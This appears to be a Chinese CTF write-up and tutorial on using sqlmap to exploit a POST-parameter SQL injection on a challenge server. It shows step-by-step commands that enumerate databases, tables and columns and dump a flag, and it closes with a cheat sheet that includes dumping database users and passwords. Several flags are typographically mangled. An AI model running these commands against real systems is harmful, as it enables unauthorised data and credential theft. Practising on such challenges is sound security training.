关于SQLmap

还是成绩单那个例子

第一步:

sqlmap -u “http://114.67.246.176:15604/" –data=”id=1” –dbs

tips:因为是post方式,所以构造语句时需要加data=

– dbs 爆出数据库名称

如图:可以看到全部的数据库

第二步:

将数据库中的所有表爆出来

构造语句:

sqlmap -u “http://114.67.246.176:15604/" –data=”id=1” -D skctf –tables

第三步:

知道了数据库 知道了表 我们将表中的字段名爆出来

构造语句:

sqlmap -u “http://114.67.246.176:15604/" –data=”id=1” -D skctf -T fl4g –columns

得到:

+————+————-+
| Column | Type |
+————+————-+
| skctf_flag | varchar(64) |
+————+————-+

第四步:

最后一步 爆字段内容

构造语句:

sqlmap -u “http://114.67.246.176:15604/" –data=”id=1” -D skctf -T fl4g -C ‘skctf_flag’ –dump

+—————————————-+
| skctf_flag |
+—————————————-+
| flag{aaab401ce593c5d4334e8c565a91b82e} |
+—————————————-+

小结(sqlmap基本命令)

  • 曝出数据库名称 –dbs

  • 查看web当前使用的数据库 –current -db

  • 曝出web数据库使用账户 –current -user

  • 列出数据库所有账户 –users

  • 曝出数据库账号和密码 –passwords

  • 列出数据库中的表 -D XX –tables

    (-D:指定数据库名称 XX:数据库名称 – tables:列出该数据库的表)

  • 列出表中的字段 -D XX -T YY –columns

(-D指数据库名称 XX指数据库 -T指要列出字段的表 YY指数据库中的表 –columns指字段)

  • 曝字段内容 -D XX -T YY -C ”a,b,c” –dump

    (-D指数据库名称 XX指数据库 -T指要列出字段的表 YY指数据库中的表 -C指定要曝的字段 –dump将结果导出)